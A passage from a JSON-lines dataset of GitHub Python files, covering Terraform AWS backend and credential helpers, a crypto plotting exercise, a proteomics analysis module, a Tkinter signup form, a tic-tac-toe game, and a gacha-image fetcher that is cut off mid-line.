session.client(\"cloudformation\", region_name=region_name)\n cloudformation_client.create_stack(\n StackName=stack_name,\n ResourceTypes=[\"AWS::DynamoDB::Table\", \"AWS::S3::Bucket\"],\n TemplateBody=json.dumps(\n {\n \"Resources\": {\n \"Table\": {\n \"Type\": \"AWS::DynamoDB::Table\",\n \"Properties\": {\n \"TableName\": table,\n \"AttributeDefinitions\": [\n {\"AttributeName\": \"LockID\", \"AttributeType\": \"S\"}\n ],\n \"KeySchema\": [\n {\"AttributeName\": \"LockID\", \"KeyType\": \"HASH\"}\n ],\n \"BillingMode\": \"PAY_PER_REQUEST\",\n },\n },\n \"Bucket\": {\n \"Type\": \"AWS::S3::Bucket\",\n \"Properties\": {\n \"AccessControl\": \"Private\",\n \"BucketName\": bucket,\n \"VersioningConfiguration\": {\"Status\": \"Enabled\"},\n },\n },\n }\n }\n ),\n )\n\n # Wait for it to complete.\n log.ok(\"backend: please wait...\")\n while True:\n sleep(10)\n response = cloudformation_client.describe_stacks(StackName=stack_name)\n for stack in response[\"Stacks\"]:\n if stack[\"StackStatus\"] == \"CREATE_IN_PROGRESS\":\n pass\n elif stack[\"StackStatus\"] == \"CREATE_COMPLETE\":\n log.ok(\"backend: create complete\")\n return\n else:\n log.bad(f\"backend: {stack['StackStatus']}\")\n log.bad(f\"backend: {stack['StackStatusReason']}\")\n\n\ndef _get_cloudformation_stack_arn(\n region_name: str, account_id: str, stack_name: str\n) -> str:\n return f\"arn:aws:cloudformation:{region_name}:{account_id}:stack/{stack_name}\"\n\n\ndef _get_dynamodb_table_arn(region_name: str, account_id: str, table: str) -> str:\n return f\"arn:aws:dynamodb:{region_name}:{account_id}:{table}\"\n\n\ndef _get_s3_bucket_arn(region_name: str, account_id: str, bucket: str) -> str:\n return f\"arn:aws:s3:{region_name}:{account_id}:{bucket}\"\n\n\n@locked\ndef _get_s3_backend_status(\n session: Session, region_name: str, bucket: str, table: str\n) -> dict:\n\n s3_client = session.client(\"s3\")\n\n try:\n response = s3_client.get_bucket_versioning(Bucket=bucket)\n except s3_client.exceptions.NoSuchBucket:\n bucket_exists = False\n bucket_versioning_enabled = False\n else:\n bucket_exists = True\n bucket_versioning_enabled = response[\"Status\"] == \"Enabled\"\n\n dynamodb_client = session.client(\"dynamodb\", region_name=region_name)\n\n try:\n dynamodb_client.describe_table(TableName=table)\n except dynamodb_client.exceptions.ResourceNotFoundException:\n table_exists = False\n else:\n table_exists = True\n\n return {\n \"bucket_exists\": bucket_exists,\n \"bucket_versioning_enabled\": bucket_versioning_enabled,\n \"table_exists\": table_exists,\n }\n\n\ndef _profile_creds_definitely_supported_by_terraform(creds: Any) -> bool:\n if creds.method in (\"config-file\", \"shared-credentials-file\"):\n # The credentials were in the config file, so Terraform\n # will have no trouble finding them using the profile.\n return True\n else:\n # The credentials were more complicated, using the assume-role\n # provider, custom-process provider, or something else. Terraform\n # does not support as many credential types as Boto (e.g. Terraform\n # can't do MFA prompts) so we should remove the \"profile\" from the\n # configuration and expose the actual credentials to Terraform.\n return False\n\n\n@locked\ndef export_environment_variables(\n session: Optional[Session] = None,\n region_name: Optional[str] = None,\n **kwargs: Any,\n) -> None:\n \"\"\"\n Exports AWS credentials as environment variables.\n\n \"\"\"\n\n if session is None:\n session = get_session(**kwargs)\n\n creds = get_frozen_credentials(session)\n\n if creds.access_key:\n os.environ[\"AWS_ACCESS_KEY_ID\"] = creds.access_key\n\n if creds.secret_key:\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = creds.secret_key\n\n if creds.token:\n os.environ[\"AWS_SECURITY_TOKEN\"] = creds.token\n os.environ[\"AWS_SESSION_TOKEN\"] = creds.token\n\n if not region_name:\n region_name = session.region_name\n if region_name:\n os.environ[\"AWS_REGION\"] = region_name\n os.environ[\"AWS_DEFAULT_REGION\"] = region_name\n\n\n@lru_cache()\n@locked\ndef get_account_id(\n session: Optional[Session] = None,\n **kwargs: Any,\n) -> str:\n if session is None:\n session = get_session(**kwargs)\n sts_client = session.client(\"sts\")\n account_id = sts_client.get_caller_identity()[\"Account\"]\n return account_id\n\n\n@locked\ndef get_frozen_credentials(\n session: Optional[Session] = None,\n **kwargs: Any,\n) -> Any:\n if session is None:\n session = get_session(**kwargs)\n return session.get_credentials().get_frozen_credentials()\n\n\n@lru_cache()\ndef get_session(**kwargs: Any) -> Session:\n if use_boto_source_profile_mfa:\n return boto_source_profile_mfa.get_session(**kwargs)\n else:\n return Session(**kwargs)\n\n\n@locked\ndef provider_aws(**body: Any) -> Block:\n \"\"\"\n Returns an AWS provider block. If provided, the `profile` option\n may be replaced with temporary credentials for that profile.\n\n \"\"\"\n\n if body.get(\"profile\"):\n session = get_session(profile_name=body[\"profile\"])\n creds = session.get_credentials()\n if not _profile_creds_definitely_supported_by_terraform(creds):\n\n # This profile is using credentials that Terraform may not\n # support, so get static/frozen credentials and inject them\n # into the configuration.\n\n del body[\"profile\"]\n\n frozen_creds = creds.get_frozen_credentials()\n body[\"access_key\"] = frozen_creds.access_key\n body[\"secret_key\"] = frozen_creds.secret_key\n if creds.token:\n body[\"token\"] = frozen_creds.token\n\n return block(\"provider\", \"aws\", body)\n\n\n@locked\ndef terraform_backend_s3(bucket: str, dynamodb_table: str, **config: Any) -> Block:\n \"\"\"\n This ensures that the S3 backend exists, prompting to create it if\n necessary, sets the credentials as environment variables in some\n cases, and returns a Terraform configuration block for it.\n\n \"\"\"\n\n # Create a session from any AWS credentials options.\n\n session_kwargs = {}\n session_kwargs_map = {\n \"profile\": \"profile_name\",\n \"access_key\": \"aws_access_key_id\",\n \"secret_key\": \"aws_secret_access_key\",\n \"token\": \"aws_session_token\",\n }\n for config_key, session_key in session_kwargs_map.items():\n config_value = config.get(config_key)\n if config_value:\n session_kwargs[session_key] = config[config_key]\n\n session = get_session(**session_kwargs)\n\n region = config.get(\"region\") or session.region_name\n\n # Replace the profile argument with environment variables.\n\n if config.get(\"profile\"):\n creds = session.get_credentials()\n if not _profile_creds_definitely_supported_by_terraform(creds):\n\n # This profile is using credentials that Terraform may not\n # support, so get static/frozen credentials and export them\n # as environment variables.\n\n # Use environment variables for credentials rather than\n # injecting them into the backend configuration because\n # Terraform gets confused when the backend configuration\n # changes, which happens with certain AWS credential types\n # such as assuming roles.\n\n del config[\"profile\"]\n\n export_environment_variables(session=session, region_name=region)\n\n # Assume role before interacting with backend resources. This not the same\n # as profiles that assume roles. This is when Terraform has specifically\n # been configured to assume a role. This is more likely to happen when\n # running Terraform on an EC2 instance using instance profile credentials,\n # or using environment variables to set credentials, and then assuming\n # different roles using those credentials.\n\n if config.get(\"role_arn\"):\n session = _assume_role(\n session,\n RoleArn=config[\"role_arn\"],\n RoleSessionName=config.get(\"session_name\", \"\"),\n ExternalId=config.get(\"external_id\", \"\"),\n )\n\n # Check if the backend resources have been created.\n\n status = _get_s3_backend_status(\n session=session, region_name=region, bucket=bucket, table=dynamodb_table\n )\n\n if not all(status.values()):\n\n if any(status.values()):\n\n log.bad(\"backend: incomplete backend setup\")\n\n account_id = get_account_id(session=session)\n bucket_arn = _get_s3_bucket_arn(region, account_id, bucket)\n table_arn = _get_dynamodb_table_arn(region, account_id, dynamodb_table)\n\n if status[\"bucket_exists\"]:\n log.ok(f\"backend: {bucket_arn} found\")\n else:\n log.bad(f\"backend: {bucket_arn} not found\")\n\n if status[\"bucket_versioning_enabled\"]:\n log.ok(f\"backend: {bucket_arn} versioning enabled\")\n else:\n log.bad(f\"backend: {bucket_arn} versioning disabled\")\n\n if status[\"table_exists\"]:\n log.ok(f\"backend: {table_arn} found\")\n else:\n log.bad(f\"backend: {table_arn} not found\")\n\n raise SystemExit(1)\n\n _create_s3_backend(\n session=session, bucket=bucket, table=dynamodb_table, region_name=region\n )\n\n # Return the configuration to use the backend.\n\n config[\"bucket\"] = bucket\n config.setdefault(\"encrypt\", True)\n config[\"dynamodb_table\"] = dynamodb_table\n config[\"region\"] = region\n\n return block(\"terraform\", {\"backend\": {\"s3\": config}})\n\n\n@locked\ndef terraform_remote_state_s3(name: str, **body: Any) -> Block:\n \"\"\"\n This returns a Terraform configuration block for a \"terraform_remote_state\"\n data source, with added support for AWS profiles using MFA prompts.\n\n \"\"\"\n\n body[\"backend\"] = \"s3\"\n config = body.get(\"config\", {})\n if config.get(\"profile\"):\n\n session = get_session(profile_name=config[\"profile\"])\n creds = session.get_credentials()\n if not _profile_creds_definitely_supported_by_terraform(creds):\n\n # This profile is using credentials that Terraform may not\n # support, so get static/frozen credentials and inject them\n # into the configuration.\n\n del config[\"profile\"]\n\n frozen_creds = creds.get_frozen_credentials()\n config[\"access_key\"] = frozen_creds.access_key\n config[\"secret_key\"] = frozen_creds.secret_key\n if creds.token:\n config[\"token\"] = frozen_creds.token\n\n return block(\"data\", \"terraform_remote_state\", name, body)\n","repo_name":"raymondbutcher/pretf","sub_path":"pretf.aws/pretf/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":13531,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"54"} +{"seq_id":"35513284620","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 3 21:51:27 2021\n\n@author: user\n\nSlope: https://www.engineeringtoolbox.com/slope-degrees-gradient-grade-d_1562.html\nAngle: https://arrayjson.com/numpy-angle/\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport time\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n#%% Set Crypto Values and Date increments\n\n# Crypto Value 1: Create 100 linear values and raise ^ 2\npower_val = [x**2 for x in np.linspace(0,5,100)]\n\n# Crypto Value 2: Create 100 linear values and raise ^ 2\npower_val2 = [x**2 for x in np.linspace(1,3,100)]\n\n# Date value ranging in 15 minute increments.\nfifteen_range = list(pd.date_range(start='1/1/2021',\n periods = 100,\n freq = '15min'))\n\n#%% Create DataFrame and columns\ndf = pd.DataFrame()\n\n# Create dataframe columns from the above values and date increments\ndf['power_val'] = power_val\ndf['power_val2'] = power_val2\ndf['15min_range'] = fifteen_range\n\n\n#%% Melt New DataFrame and plot in Seaborn\n\n# Create df two and melt the values into the date range.\n# Melting data is required to properly plot multiple data set on seaborn.\ndf_two = pd.melt(df, \n id_vars=['15min_range'], \n value_vars=['power_val','power_val2'])\n\n# Graph out a line plot with the melted DataFrame\nsns.lineplot(x = '15min_range', \n y ='value', \n hue = 'variable', \n data = df_two)\n\n#%% Display DataFrame and Query value crossover\n\n# For loop and output value columns and boolean comparison.\nfor x in range(len(df)):\n # if df['power_val'][x] == df['power_val2'][x]:\n # print('{},{},{}'.format('MATCH',\n # df['power_val'][x],\n # df['power_val2'][x]))\n # else:\n # pass\n print(df['power_val'][x],\n df['power_val2'][x], \n df['power_val'][x] < df['power_val2'][x])\n time.sleep(0.2)\n\n#%% Build function to show slope of each line\n \n# Find the X value and Y value\nX = df['15min_range'].iloc[-4:]\nY = df['power_val2'].iloc[-4:]\nZ = df['power_val'].iloc[-4:]\n\nx = [1,2,3,4]\ny = [1,2,3,4]\n\nsns.scatterplot(data=df, x='15min_range', y='power_val2')\n\n# Output a graph that shows 4 values of: time and powerval2\nplt.xticks(rotation=45)\nplt.scatter(df['15min_range'].iloc[-5:], df['power_val2'].iloc[-5:])\n\nprint('{} {}'.format(df['power_val2'].iloc[-4:].diff(),\n df['power_val2'].iloc[-4:]))\n\n#%% Solution for slope and degrees\n\"\"\"\nEach X increment in my graph is 15 minutes, which is equivilant to one time\nseries increment.\nSo....the X increment is always 1.\n\nY increment will be the difference of the Y Series (SEE: Series.diff())\nExample:\n \nY = df['power_val2'].iloc[-4:]\n\nY\nOut[84]: \n96 8.640037\n97 8.759208\n98 8.879196\n99 9.000000\nName: power_val2, dtype: float64\n\nY.diff()\nOut[85]: \n96 NaN\n97 0.119172\n98 0.119988\n99 0.120804\nName: power_val2, dtype: float64\n\nExample: np.angle(X + Yj, deg=True)\n\nnp.angle(1 + 0.119172j, deg=True)\nOut[110]: 6.795973881572169\n\nMy final thought for the night....I will use .diff() to find my Y value;\nassuming my .diff() default period will be 1, my X value will also be 1.\n\nOnce I have the .diff() value, I will use .angle() to output a degree.\n\nBoth the .diff() and the .angle() will be values for each row.\n \n\"\"\"\n\n\n\n\n\n","repo_name":"dervinfro/Examples","sub_path":"Example_Crypto_Values_Graph.py","file_name":"Example_Crypto_Values_Graph.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22448382260","text":"import json\nimport logging\nfrom dataclasses import asdict, dataclass\nfrom pathlib import Path\nfrom typing import Literal\n\nfrom anndata import AnnData\n\nfrom pixelator.analysis.colocalization import colocalization_scores\nfrom pixelator.analysis.colocalization.types import TransformationTypes\nfrom pixelator.analysis.polarization import polarization_scores\nfrom pixelator.pixeldataset import (\n PixelDataset,\n)\nfrom pixelator.utils import np_encoder\n\nlogger = logging.getLogger(__name__)\n\nPolarizationNormalizationTypes = Literal[\"raw\", \"clr\", \"denoise\"]\n\n\n@dataclass(frozen=True)\nclass AnalysisParameters:\n compute_polarization: bool\n compute_colocalization: bool\n use_full_bipartite: bool\n polarization_normalization: PolarizationNormalizationTypes\n polarization_binarization: bool\n colocalization_transformation: TransformationTypes\n colocalization_neighbourhood_size: int\n colocalization_n_permutations: int\n colocalization_min_region_count: int\n\n\ndef analyse_pixels(\n input: str,\n output: str,\n output_prefix: str,\n metrics_file: str,\n compute_polarization: bool,\n compute_colocalization: bool,\n use_full_bipartite: bool,\n polarization_normalization: Literal[\"raw\", \"clr\", \"denoise\"],\n polarization_binarization: bool,\n colocalization_transformation: TransformationTypes,\n colocalization_neighbourhood_size: int,\n colocalization_n_permutations: int,\n colocalization_min_region_count: int,\n verbose: bool,\n) -> None:\n \"\"\"\n This function takes a `PixelDataset` (zip) that has been generated\n with `pixelator annotate`. The function then uses the `edge list` and\n the `AnnData` to compute the scores (polarization, co-abundance and\n co-localization) which are then added to the `PixelDataset` (depending\n on which scores are enabled).\n\n :param input: the path to the PixelDataset (zip)\n :param output: the path to the output file\n :param output_prefix: the prefix to prepend to the output file\n :param metrics_file: the path to a JSON file to write metrics\n :param compute_polarization: compute polarization scores when True\n :param compute_colocalization: compute colocalization scores when True\n :param use_full_bipartite: use the bipartite graph instead of the\n one-node-projection (UPIA)\n :param polarization_normalization: the method to use to normalize the\n antibody counts (raw, clr or denoise)\n :param polarization_binarization: transform the counts to 0-1 when\n computing polarization scores\n :param colocalization_transformation: Select a transformation method to use\n for the colocalization\n :param colocalization_neighbourhood_size: Set the size of the neighbourhood to\n consider when computing the colocalization\n :param colocalization_n_permutations: Select number of permutations used to\n calculate empirical p-values of the\n colocalization values\n :param colocalization_min_region_count: The minimum size of the region (e.g. number\n of counts in the neighbourhood) required\n for it to be considered\n :param verbose: run if verbose mode when true\n :returns: None\n :raises AssertionError: the input arguments are not valid\n \"\"\"\n logger.debug(\"Parsing PixelDataset from %s\", input)\n\n # load the PixelDataset\n dataset = PixelDataset.from_file(input)\n edgelist = dataset.edgelist\n adata: AnnData = dataset.adata\n\n # get conntrol antibodies\n antibody_control = adata.var[adata.var[\"control\"]].index.to_list()\n if polarization_normalization == \"denoise\" and len(antibody_control) == 0:\n raise AssertionError(\n \"normalization method is 'denoise' but the list of control antibodies is\"\n \" empty\"\n )\n logger.debug(\"Loaded %s control antibodies\", \",\".join(antibody_control))\n\n if len(antibody_control) == 0:\n antibody_control = None\n\n metrics = {} # type: ignore\n metrics[\"polarization\"] = \"yes\" if compute_polarization else \"no\"\n metrics[\"colocalization\"] = \"yes\" if compute_colocalization else \"no\"\n metrics[\"denoise\"] = \"yes\" if polarization_normalization == \"denoise\" else \"no\"\n metrics[\"antibody_control\"] = antibody_control\n\n # polarization scores\n if compute_polarization:\n # obtain polarization scores\n scores = polarization_scores(\n edgelist=edgelist,\n use_full_bipartite=use_full_bipartite,\n normalization=polarization_normalization,\n antibody_control=antibody_control,\n binarization=polarization_binarization,\n )\n dataset.polarization = scores\n\n # colocalization scores\n if compute_colocalization:\n # obtain colocalization scores\n scores = colocalization_scores(\n edgelist=edgelist,\n use_full_bipartite=use_full_bipartite,\n transformation=colocalization_transformation,\n neighbourhood_size=colocalization_neighbourhood_size,\n n_permutations=colocalization_n_permutations,\n min_region_count=colocalization_min_region_count,\n )\n dataset.colocalization = scores\n\n dataset.metadata[\"analysis\"] = {\n \"params\": asdict(\n AnalysisParameters(\n compute_colocalization=compute_colocalization,\n compute_polarization=compute_polarization,\n use_full_bipartite=use_full_bipartite,\n polarization_normalization=polarization_normalization,\n polarization_binarization=polarization_binarization,\n colocalization_transformation=colocalization_transformation,\n colocalization_neighbourhood_size=colocalization_neighbourhood_size,\n colocalization_n_permutations=colocalization_n_permutations,\n colocalization_min_region_count=colocalization_min_region_count,\n )\n )\n }\n # save dataset\n dataset.save(str(Path(output) / f\"{output_prefix}.dataset.pxl\"))\n\n # save metrics (JSON)\n with open(metrics_file, \"w\") as outfile:\n json.dump(metrics, outfile, default=np_encoder)\n","repo_name":"PixelgenTechnologies/pixelator","sub_path":"src/pixelator/analysis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"25953124150","text":"import hashlib\nimport time\n\n__author__ = 'victor'\n\nnow = int(time.time())\ntext = str(now)+'testkeychangeme'\ntoken = hashlib.sha256(text.encode('utf8')).hexdigest()\nprint(now)\n\nprint('?token=%s×tamp=%s' % (token, now))\n","repo_name":"victorhaggqvist/ledman","sub_path":"testkeys.py","file_name":"testkeys.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37237867760","text":"\r\nfrom ctypes import alignment\r\nfrom tkinter import*\r\nfrom PIL import Image,ImageTk # to deal jpg file in python\r\nclass Register:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.title(\"Sign up page\") \r\n self.root.geometry(\"1500x1000\")\r\n \r\n self.root.config(bg=\"#1FC2CC\") \r\n \r\n img=Image.open(r\"C:\\Users\\ASUS\\.spyder-py3\\signup\\images\\file1.jpg\")\r\n img=img.resize((150,50),Image.ANTIALIAS)\r\n \r\n \r\n self.up=ImageTk.PhotoImage(img)\r\n up=Label(self.root,image=self.up,bg=\"white\").place(x=0,y=0,width=150,height=50) \r\n \r\n frame2=Frame(self.root,bg=\"white\")\r\n frame2.place(x=150,y=0,width=1400,height=50)\r\n \r\n hbtn=Button(frame2, text=\"HOME\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n hbtn.place(x=650,y=0,width=50,height=20)\r\n \r\n hbtn=Button(frame2, text=\"SEMINAR\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n hbtn.place(x=800,y=0,width=90,height=20)\r\n \r\n hbtn=Button(frame2, text=\"INFORMATION\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n hbtn.place(x=790,y=30,width=120,height=20)\r\n \r\n dbtn=Button(frame2, text=\"DASHBOARD\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n dbtn.place(x=1000,y=0,width=120,height=20)\r\n \r\n \r\n frame1=Frame(self.root,bg=\"#1FC2CC\")\r\n frame1.place(x=0,y=50,width=800,height=950)\r\n title=Label(frame1,text=\"SIGN UP FORM\",font=(\"times new roman\",20,\"bold\"),bg=\"white\",fg=\"black\").place(x=400,y=50)\r\n \r\n img1=Image.open(r\"C:\\Users\\ASUS\\.spyder-py3\\signup\\images\\side.jpg\")\r\n img1=img1.resize((700,950),Image.ANTIALIAS)\r\n \r\n self.right=ImageTk.PhotoImage(img1)\r\n right=Label(self.root,image=self.right).place(x=950,y=50,width=700,height=900)\r\n \r\n name=Label(frame1,text=\"Name\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=100)\r\n \r\n txt_fname=Entry(frame1,font=(\"times new roman\",18),bg=\"white\").place(x=290,y=100,width=1000)\r\n \r\n gender=Label(frame1,text=\"Gender\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=150)\r\n var1 = IntVar()\r\n radiobtn1=Radiobutton(frame1,text=\"Male\",variable =var1,value=1,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=290,y=150)\r\n radiobtn2=Radiobutton(frame1,text=\"Female\",variable =var1,value=2,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=490,y=150)\r\n \r\n #radio button frame2\r\n \r\n frame3=Frame(self.root,bg=\"#1FC2CC\")\r\n frame3.place(x=0,y=250,width=700,height=40)\r\n var2 = IntVar()\r\n ms=Label(frame3,text=\"Marital Status\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=5)\r\n radiobtn3=Radiobutton(frame3,text=\"Married\",variable =var2,value=\"rad3\",font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=290,y=5)\r\n radiobtn4=Radiobutton(frame3,text=\"Unmarried\",variable =var2,value=\"rad4\",font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=490,y=5)\r\n \r\n email=Label(frame1,text=\"Email Id\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=260)\r\n txt_email=Entry(frame1,font=(\"times new roman\",18),bg=\"white\").place(x=290,y=260,width=1000) \r\n \r\n adress=Label(frame1,text=\"Address\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=310)\r\n txt_adress=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=310,width=1000)\r\n \r\n organization=Label(frame1,text=\"Organization\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=360)\r\n txt_org=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=360,width=1000)\r\n \r\n designation=Label(frame1,text=\"Designation\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=410)\r\n txt_desg=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=410,width=1000)\r\n \r\n dob=Label(frame1,text=\"DOB\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=460)\r\n txt_dob=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=460,width=1000)\r\n \r\n mobile_no=Label(frame1,text=\"Mobile No.\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=510)\r\n txt_mobile_no=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=510,width=1000)\r\n \r\n \r\n img_button=Button(frame1,text=\"Take Image\",font=(\"times new roman\",18,\"bold\"),bd=0,bg=\"white\",fg=\"black\").place(x=290,y=560)\r\n \r\n sub_button=Button(frame1,text=\"Submit\",font=(\"times new roman\",18,\"bold\"),bd=0,bg=\"white\",fg=\"blue\").place(x=590,y=560)\r\n \r\n #self.bg is obj of class\r\n \r\n \r\nroot=Tk()\r\nobj=Register(root)\r\n\r\nroot.mainloop()\r\n","repo_name":"farhana1604022/Pyhton_","sub_path":"signup/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7535030337","text":"def printTable(xAxis, yAxis):\n zero = 'X' if xAxis[0] else('O' if yAxis[0] else 0)\n one = 'X' if xAxis[1] else('O' if yAxis[1] else 1)\n two = 'X' if xAxis[2] else('O' if yAxis[2] else 2)\n three = 'X' if xAxis[3] else('O' if yAxis[3] else 3)\n four = 'X' if xAxis[4] else('O' if yAxis[4] else 4)\n five = 'X' if xAxis[5] else('O' if yAxis[5] else 5)\n six = 'X' if xAxis[6] else('O' if yAxis[6] else 6)\n seven = 'X' if xAxis[7] else('O' if yAxis[7] else 7)\n eight = 'X' if xAxis[8] else('O' if yAxis[8] else 8)\n \n print(f\" {zero} | {one} | {two} \")\n print(f\" ---|---|--- \")\n print(f\" {three} | {four} | {five} \")\n print(f\" ---|---|--- \")\n print(f\" {six} | {seven} | {eight} \")\n\ndef sum(a,b,c):\n return a + b + c; \n\ndef checkWin(xAxis, yAxis):\n winner = [[0,1,2],[3,4,5],[6,7,8],[0,3,6],[1,4,7],\n [2,5,8],[0,4,8],[2,4,6]]\n for win in winner:\n if(sum(xAxis[win[0]], xAxis[win[1]], xAxis[win[2]]) == 3):\n print(\"X Won the Game\")\n return 1\n if(sum(yAxis[win[0]], yAxis[win[1]], yAxis[win[2]]) == 3):\n print(\"O Won the Game\")\n return 0\n return -1\n\n\nif __name__ == \"__main__\": \n xAxis = [0,0,0,0,0,0,0,0,0]\n yAxis = [0,0,0,0,0,0,0,0,0]\n turn = 1\n print(\"Welcome to Tic Tac Toe\")\n while(True):\n printTable(xAxis, yAxis)\n if(turn == 1):\n print(\"Player X Chance\")\n value = int(input(\"Please Enter X Position: \"))\n xAxis[value] = 1\n else:\n print(\"Player O Chance\")\n value = int(input(\"Please Enter O Position: \"))\n yAxis[value] = 1\n \n winner = checkWin(xAxis, yAxis)\n if(winner != -1):\n print(\"Match Over\")\n break\n \n turn = 1 - turn\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"SaadMeer/Tic-Tac-Toe-Game-in-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71374211362","text":"import datetime\nimport os.path\nimport random\n\nimport httpx\nimport asyncio\n\nimport requests\nimport yaml\nfrom PIL import Image\nfrom io import BytesIO\n\nfrom plugins.RandomStr import random_str\n\n\ndef get_headers():\n user_agent_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"]\n\n userAgent = random.choice(user_agent_list)\n headers = {'User-Agent': userAgent}\n return headers\n\n\nasync def arkGacha():\n headers = get_headers()\n url=\"http://api.elapsetower.com/arknightsdraw\"\n\n path=\"data/pictures/cache/\"+random_str()+\".png\"\n #path=\"moyu.png\"\n #print(path)\n if os.path.exists(path):\n return path\n else:\n async with httpx.AsyncClient(timeout=20,headers=headers) as client:\n r = await client.get(url)\n img = Image.open(BytesIO(r.content)) # 从二进制数据创建图片对象\n img.save(path) # 使用PIL库保存图片\n #print(path)\n return path\nasync def starRailGacha():\n with open('data/GachaData/StarRail.yaml', 'r', encoding='utf-8') as file:\n students= yaml.load(file, Loader=yaml.FullLoader)\n\n i = 0\n character = []\n\n while i < 10:\n if 